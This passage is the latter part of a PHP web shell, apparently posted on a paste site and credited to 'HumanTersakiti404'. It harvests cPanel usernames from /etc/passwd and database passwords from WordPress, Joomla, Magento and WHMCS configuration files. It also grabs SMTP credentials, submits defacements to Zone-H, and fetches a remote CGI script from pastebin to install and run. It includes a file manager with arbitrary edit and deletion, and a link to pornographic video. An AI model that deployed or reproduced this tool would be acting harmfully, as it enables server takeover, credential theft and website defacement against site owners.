  2339.                         $_SESSION[$pcp] = "1";
  2340.                         if($ucp == '' || $pcp == '') {
  2341.                            
  2342.                         } else {
  2343.                             $i++;
  2344.                             if(function_exists('posix_getpwuid')) {
  2345.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  2346.                                 if($domain_cp == '') {
  2347.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  2348.                                 } else {
  2349.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2350.                                     foreach($domains_cp[1] as $dj) {
  2351.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2352.                                         $user_cp_url = $user_cp_url['name'];
  2353.                                         if($user_cp_url == $ucp) {
  2354.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=cyan>$dj</font></a>";
  2355.                                             break;
  2356.                                         }
  2357.                                     }
  2358.                                 }
  2359.                             } else {
  2360.                                 $dom = "<font color=red>function is Disable by system</font>";
  2361.                             }
  2362.                             echo "username (<font color=cyan>$ucp</font>) password (<font color=cyan>$pcp</font>) domain ($dom)<br>";
  2363.                         }
  2364.                     }
  2365.                 }
  2366.             }
  2367.         }
  2368.         if($i == 0) {
  2369.         } else {
  2370.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=cyan>HumanTersakiti404.</font>";
  2371.         }
  2372.     } else {
  2373.         echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] cPanel Crack [+]</div>";
  2374.         echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2375.         echo "<form method='post'>
  2376.         USER: <br>
  2377.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2378.         $_usercp = fopen("/etc/passwd","r");
  2379.         while($getu = fgets($_usercp)) {
  2380.             if($getu == '' || !$_usercp) {
  2381.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2382.             } else {
  2383.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2384.                 foreach($u[1] as $user_cp) {
  2385.                         if(is_dir("/home/$user_cp/public_html")) {
  2386.                             echo "$user_cp\n";
  2387.                     }
  2388.                 }
  2389.             }
  2390.         }
  2391.         echo "</textarea><br>
  2392.         PASS: <br>
  2393.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2394.         function cp_pass($dir) {
  2395.             $pass = "";
  2396.             $dira = scandir($dir);
  2397.             foreach($dira as $dirb) {
  2398.                 if(!is_file("$dir/$dirb")) continue;
  2399.                 $ambil = file_get_contents("$dir/$dirb");
  2400.                 if(preg_match("/WordPress/", $ambil)) {
  2401.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2402.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2403.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2404.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2405.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2406.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2407.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2408.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2409.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2410.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  2411.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  2412.                     if(preg_match('/"/', $pass1[1])) {
  2413.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2414.                         $pass .= $pass1[1]."\n";
  2415.                     } else {
  2416.                         $pass .= $pass1[1]."\n";
  2417.                     }
  2418.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2419.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2420.                 }
  2421.             }
  2422.             echo $pass;
  2423.         }
  2424.         $cp_pass = cp_pass($dir);
  2425.         echo $cp_pass;
  2426.         echo "</textarea><br>
  2427.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2428.         </form>
  2429.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2430.     }
  2431. } elseif($_GET['do'] == 'smtp') {
  2432.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2433.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2434.     echo "</div>";
  2435.     function scj($dir) {
  2436.         $dira = scandir($dir);
  2437.         foreach($dira as $dirb) {
  2438.             if(!is_file("$dir/$dirb")) continue;
  2439.             $ambil = file_get_contents("$dir/$dirb");
  2440.             $ambil = str_replace("$", "", $ambil);
  2441.             if(preg_match("/JConfig|joomla/", $ambil)) {
  2442.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2443.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2444.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2445.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2446.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2447.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2448.                 echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>[+] SMTP Grabber[+]</div>";
  2449.                 echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2450.                 echo "SMTP Host: <font color=cyan>$smtp_host</font><br>";
  2451.                 echo "SMTP port: <font color=cyan>$smtp_port</font><br>";
  2452.                 echo "SMTP user: <font color=cyan>$smtp_user</font><br>";
  2453.                 echo "SMTP pass: <font color=cyan>$smtp_pass</font><br>";
  2454.                 echo "SMTP auth: <font color=cyan>$smtp_auth</font><br>";
  2455.                 echo "SMTP secure: <font color=cyan>$smtp_secure</font><br><br>";
  2456.             }
  2457.         }
  2458.     }
  2459.     $smpt_hunter = scj($dir);
  2460.     echo $smpt_hunter;
  2461. } elseif($_GET['do'] == 'zoneh') {
  2462.     if($_POST['submit']) {
  2463.         $domain = explode("\r\n", $_POST['url']);
  2464.         $nick =  $_POST['nick'];
  2465.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2466.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2467.         function zoneh($url,$nick) {
  2468.             $ch = curl_init("http://www.zone-h.com/notify/single");
  2469.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2470.                   curl_setopt($ch, CURLOPT_POST, true);
  2471.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2472.             return curl_exec($ch);
  2473.                   curl_close($ch);
  2474.         }
  2475.         foreach($domain as $url) {
  2476.             $zoneh = zoneh($url,$nick);
  2477.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2478.                 echo "$url -> <font color=cyan>OK</font><br>";
  2479.             } else {
  2480.                 echo "$url -> <font color=red>ERROR</font><br>";
  2481.             }
  2482.         }
  2483.     } else {
  2484.         echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Zone-H [+]</div>";
  2485.         echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2486.         echo "<center><form method='post'>
  2487.         <u>Defacer</u>: <br>
  2488.         <input type='text' name='nick' size='50' value='human'><br>
  2489.         <u>Domains</u>: <br>
  2490.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2491.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2492.         </form>";
  2493.     }
  2494.     echo "</center>";
  2495. } elseif($_GET['do'] == 'cgi') {
  2496.     $cgi_dir = mkdir('human_cgi', 0755);
  2497.     $file_cgi = "human_cgi/cgi.izo";
  2498.     $isi_htcgi = "AddHandler cgi-script .izo";
  2499.     $htcgi = fopen(".htaccess", "w");
  2500.     fwrite($htcgi, $isi_htcgi);
  2501.     fclose($htcgi);
  2502.     $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  2503.     $cgi = fopen($file_cgi, "w");
  2504.     fwrite($cgi, $cgi_script);
  2505.     fclose($cgi);
  2506.     chmod($file_cgi, 0755);
  2507.     echo "<iframe src='human_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2508. }
  2509. elseif($_GET['do'] == 'videosex') {
  2510. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Streaming Video Sex [+]</div>";
  2511.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2512. echo "<video src='http://videobokep.co/v/93.mp4' controls></video>";
  2513. }
  2514. elseif($_GET['do'] == 'adminer') {
  2515.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2516.     function adminer($url, $isi) {
  2517.         $fp = fopen($isi, "w");
  2518.         $ch = curl_init();
  2519.               curl_setopt($ch, CURLOPT_URL, $url);
  2520.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2521.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2522.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2523.               curl_setopt($ch, CURLOPT_FILE, $fp);
  2524.         return curl_exec($ch);
  2525.               curl_close($ch);
  2526.         fclose($fp);
  2527.         ob_flush();
  2528.         flush();
  2529.     }
  2530.     if(file_exists('adminer.php')) {
  2531.         echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2532.     } else {
  2533.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2534.             echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2535.         } else {
  2536.             echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2537.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  2538.         }
  2539.     }
  2540. } elseif($_GET['do'] == 'phinfo')
  2541. {@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div>";}
  2542. elseif($_GET['act'] == 'newfile') {
  2543.     if($_POST['new_save_file']) {
  2544.         $newfile = htmlspecialchars($_POST['newfile']);
  2545.         $fopen = fopen($newfile, "a+");
  2546.         if($fopen) {
  2547.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2548.         } else {
  2549.             $act = "<font color=red>permission denied</font>";
  2550.         }
  2551.     }
  2552.     echo $act;
  2553.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Create File [+]</div>";
  2554.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2555.     echo "<form method='post'>
  2556.     Filename: <input type='text' name='newfile' value='$dir/asu.php' style='width: 450px;' height='10'>
  2557.     <input type='submit' name='new_save_file' value='Submit'>
  2558.     </form>";
  2559. } elseif($_GET['act'] == 'newfolder') {
  2560.     if($_POST['new_save_folder']) {
  2561.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2562.         if(!mkdir($new_folder)) {
  2563.             $act = "<font color=red>permission denied</font>";
  2564.         } else {
  2565.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2566.         }
  2567.     }
  2568.     echo $act;
  2569.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Create Folder DIR [+]</div>";
  2570.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2571.     echo "<form method='post'>
  2572.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2573.     <input type='submit' name='new_save_folder' value='Submit'>
  2574.     </form>";
  2575. } elseif($_GET['act'] == 'rename_dir') {
  2576.     if($_POST['dir_rename']) {
  2577.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2578.         if($dir_rename) {
  2579.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2580.         } else {
  2581.             $act = "<font color=red>permission denied</font>";
  2582.         }
  2583.     echo "".$act."<br>";
  2584.     }
  2585.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Rename File / DIR [+]</div>";
  2586.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2587.     echo "<form method='post'>
  2588.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2589.     <input type='submit' name='dir_rename' value='rename'>
  2590.     </form>";
  2591. } elseif($_GET['act'] == 'delete_dir') {
  2592.     if(is_dir($dir)) {
  2593.         if(is_writable($dir)) {
  2594.             @rmdir($dir);
  2595.             @exe("rm -rf $dir");
  2596.             @exe("rmdir /s /q $dir");
  2597.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2598.         } else {
  2599.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2600.         }
  2601.     }
  2602.     echo $act;
  2603. } elseif($_GET['act'] == 'view') {
  2604.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] View File [+]</div>";
  2605.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2606.     echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2607.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2608. } elseif($_GET['act'] == 'edit') {
  2609.     if($_POST['save']) {
  2610.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2611.         if($save) {
  2612.             $act = "<font color=cyan>Saved!</font>";
  2613.         } else {
  2614.             $act = "<font color=red>permission denied</font>";
  2615.         }
  2616.     echo "".$act."<br>";
  2617.     }
  2618.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Edit File [+]</div>";
  2619.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2620.     echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2621.     echo "<form method='post'>
  2622.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2623.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  2624.     </form>";
  2625. } elseif($_GET['act'] == 'rename') {
  2626.     if($_POST['do_rename']) {
  2627.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2628.         if($rename) {
  2629.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2630.         } else {
  2631.             $act = "<font color=red>permission denied</font>";
  2632.         }
  2633.     echo "".$act."<br>";
  2634.     }
  2635.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Rename [+]</div>";
  2636.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2637.     echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2638.     echo "<form method='post'>
  2639.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2640.     <input type='submit' name='do_rename' value='rename'>
  2641.     </form>";
  2642. } elseif($_GET['act'] == 'delete') {
  2643.     $delete = unlink($_GET['file']);
  2644.     if($delete) {
  2645.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2646.     } else {
  2647.         $act = "<font color=red>permission denied</font>";
  2648.     }
  2649.     echo $act;
  2650. } else {
  2651.     if(is_dir($dir) === true) {
  2652.         if(!is_readable($dir)) {
  2653.             echo "<font color=red>can't open directory. ( not readable )</font>";
  2654.         } else {
  2655.             echo '<table width="100%" class="human" border="0" cellpadding="3" cellspacing="1" align="center">
  2656.             <tr>
  2657.             <th class="th_home"><center>Name</center></th>
  2658.             <th class="th_home"><center>Type</center></th>
  2659.             <th class="th_home"><center>Size</center></th>
  2660.             <th class="th_home"><center>Last Modified</center></th>
  2661.             <th class="th_home"><center>Owner/Group</center></th>
  2662.             <th class="th_home"><center>Permission</center></th>
  2663.             <th class="th_home"><center>Action</center></th>
  2664.             </tr>';
  2665.             $scandir = scandir($dir);
  2666.             foreach($scandir as $dirx) {
  2667.                 $dtype = filetype("$dir/$dirx");
  2668.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2669.                 if(function_exists('posix_getpwuid')) {
  2670.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2671.                     $downer = $downer['name'];
  2672.                 } else {
  2673.                     //$downer = $uid;
  2674.                     $downer = fileowner("$dir/$dirx");
  2675.                 }
  2676.                 if(function_exists('posix_getgrgid')) {
  2677.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2678.                     $dgrp = $dgrp['name'];
  2679.                 } else {
  2680.                     $dgrp = filegroup("$dir/$dirx");
  2681.                 }
  2682.                 if(!is_dir("$dir/$dirx")) continue;
  2683.                 if($dirx === '..') {
  2684.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2685.                 } elseif($dirx === '.') {
  2686.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  2687.                 } else {
  2688.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2689.                 }
  2690.                 if($dirx === '.' || $dirx === '..') {
  2691.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2692.                     } else {
  2693.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2694.                 }
  2695.                 echo "<tr>";
  2696.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2697.                 echo "<td class='td_home'><center>$dtype</center></td>";
  2698.                 echo "<td class='td_home'><center>-</center></th></td>";
  2699.                 echo "<td class='td_home'><center>$dtime</center></td>";
  2700.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2701.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2702.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2703.                 echo "</tr>";
  2704.             }
  2705.         }
  2706.     } else {
  2707.         echo "<center>";
  2708.         echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2709.         echo "<font color=red>can't open directory.</font>";
  2710.     }
  2711.         foreach($scandir as $file) {
  2712.             $ftype = filetype("$dir/$file");
  2713.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2714.             $size = filesize("$dir/$file")/1024;
  2715.             $size = round($size,3);
  2716.             if(function_exists('posix_getpwuid')) {
  2717.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2718.                 $fowner = $fowner['name'];
  2719.             } else {
  2720.                 //$downer = $uid;
  2721.                 $fowner = fileowner("$dir/$file");
  2722.             }
  2723.             if(function_exists('posix_getgrgid')) {
  2724.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2725.                 $fgrp = $fgrp['name'];
  2726.             } else {
  2727.                 $fgrp = filegroup("$dir/$file");
  2728.             }
  2729.             if($size > 1024) {
  2730.                 $size = round($size/1024,2). 'MB';
  2731.             } else {
  2732.                 $size = $size. 'KB';
  2733.             }
  2734.             if(!is_file("$dir/$file")) continue;
  2735.             echo "<tr>";
  2736.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2737.             echo "<td class='td_home'><center>$ftype</center></td>";
  2738.             echo "<td class='td_home'><center>$size</center></td>";
  2739.             echo "<td class='td_home'><center>$ftime</center></td>";
  2740.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2741.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2742.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2743.             echo "</tr>";
  2744.         }
  2745.         echo "</table>";
  2746.         if(!is_readable($dir)) {
  2747.             //
  2748.         } else {
  2749.             echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2750.             echo "<center>Recode by <font color=black>HumanTersakiti404</a></center>";
  2751.         }
  2752. }
  2753. ?>
  2754. </html>
Add Comment
Please, Sign In to add comment